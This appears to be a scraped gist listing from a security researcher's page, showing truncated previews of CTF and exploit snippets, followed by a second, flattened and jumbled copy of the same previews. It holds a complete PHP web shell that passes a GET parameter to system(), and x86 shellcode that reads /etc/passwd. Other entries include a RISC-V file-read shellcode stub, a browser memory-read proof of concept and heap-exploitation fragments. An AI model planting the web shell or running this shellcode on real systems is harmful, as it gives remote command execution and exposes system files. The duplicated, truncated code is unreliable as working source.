Jinmo Jinmo

## MoveTracer.cpp
#include "pin.H"
#include <stdio.h>

FILE *out_fp;
VOID TraceMove(VOID *addr) {
	fprintf(out_fp, "%p: MOV Here!\n", addr);
}

VOID INSAnalysis(INS ins, VOID *v) {
	if (INS_Opcode(ins) == XED_ICLASS_MOV)

## shell.php
<?php
 echo 'Shell launched!\n';
 system($_GET[cmd]);
?>

## readfile_x86.s
jmp a
b:
pop ebx
xor ecx, ecx
xor edx, edx
lea eax, [ecx+5]
int 0x80
xchg eax, ecx
mov al, 187
lea ebx, [edx+1]

## riscv-readfile.s
# file read shellcode
# riscv
# - buffer: pc + 0x100, must be writable
# - if you want, you can change it

# compile:
# export PATH=$PATH:/opt/riscv/bin
# riscv64-unknown-elf-as code.s -o code.o
# riscv64-unknown-elf-objcopy --dump-section .text=code.dump code.o
# output: code.dump

## poc.html
<html>
<head>
<script type="text/javascript">
function qs(addr, read) {
	var s = '';
	var i;
	var c = 0;
	for(i = 0; i < 50; i++) {
		c = (read(addr + i - 2) >> 16) & 0xff;
		if(c == 0) return s;

## gist:087cec3ea791bc6744dd05182855721b
function check_space {
	if [[ $1 == *[bdks';''&'' ']* ]]
	then
    		return 0
	fi

	return 1
}

while :

## read.s
.intel_syntax noprefix
.globl _start
_start:
xor ecx, ecx
mul ecx
push ecx
push 0x64777373
push 0x61702f63
push 0x74652f2f
mov al, 5

## mario.py
import itertools
import struct

# Rotate left: 0b1001 --> 0b0011
rol = lambda val, r_bits, max_bits: \
    (val << r_bits%max_bits) & (2**max_bits-1) | \
    ((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))

# Rotate right: 0b1001 --> 0b1100
ror = lambda val, r_bits, max_bits: \

## drawdrawdraw.py
from transaction_pb2 import Transaction, Reply, Command
from rc4 import RC4 # https://github.com/bozhu/RC4-Python

import socket
import hexdump
import random
import struct
import telnetlib
import sys

## malloc.mmap.c
// How to call munmap(0x414141410000, 0x20000)
// : the hard way
// tested on 64bit ubuntu

#define SIZE 0x20000

int main() {
    long long chunk[3];
    long long target;
    target = 0x414141410000LL;
	#include "pin.H"
	#include <stdio.h>

	FILE *out_fp;
	VOID TraceMove(VOID *addr) {
	fprintf(out_fp, "%p: MOV Here!\n", addr);
	}

	VOID INSAnalysis(INS ins, VOID *v) {
	if (INS_Opcode(ins) == XED_ICLASS_MOV)
	jmp a
	b:
	pop ebx
	xor ecx, ecx
	xor edx, edx
	lea eax, [ecx+5]
	int 0x80
	xchg eax, ecx
	mov al, 187
	lea ebx, [edx+1]
	# file read shellcode
	# riscv
	# - buffer: pc + 0x100, must be writable
	# - if you want, you can change it

	# compile:
	# export PATH=$PATH:/opt/riscv/bin
	# riscv64-unknown-elf-as code.s -o code.o
	# riscv64-unknown-elf-objcopy --dump-section .text=code.dump code.o
	# output: code.dump
	<html>
	<head>
	<script type="text/javascript">
	function qs(addr, read) {
	var s = '';
	var i;
	var c = 0;
	for(i = 0; i < 50; i++) {
	c = (read(addr + i - 2) >> 16) & 0xff;
	if(c == 0) return s;
	function check_space {
	if [[ $1 == [bdks';''&'' '] ]]
	then
	return 0
	fi

	return 1
	}

	while :
	.intel_syntax noprefix
	.globl _start
	_start:
	xor ecx, ecx
	mul ecx
	push ecx
	push 0x64777373
	push 0x61702f63
	push 0x74652f2f
	mov al, 5
	import itertools
	import struct

	# Rotate left: 0b1001 --> 0b0011
	rol = lambda val, r_bits, max_bits: \
	(val << r_bits%max_bits) & (2**max_bits-1) \| \
	((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))

	# Rotate right: 0b1001 --> 0b1100
	ror = lambda val, r_bits, max_bits: \
	from transaction_pb2 import Transaction, Reply, Command
	from rc4 import RC4 # https://github.com/bozhu/RC4-Python

	import socket
	import hexdump
	import random
	import struct
	import telnetlib
	import sys
	// How to call munmap(0x414141410000, 0x20000)
	// : the hard way
	// tested on 64bit ubuntu

	#define SIZE 0x20000

	int main() {
	long long chunk[3];
	long long target;
	target = 0x414141410000LL;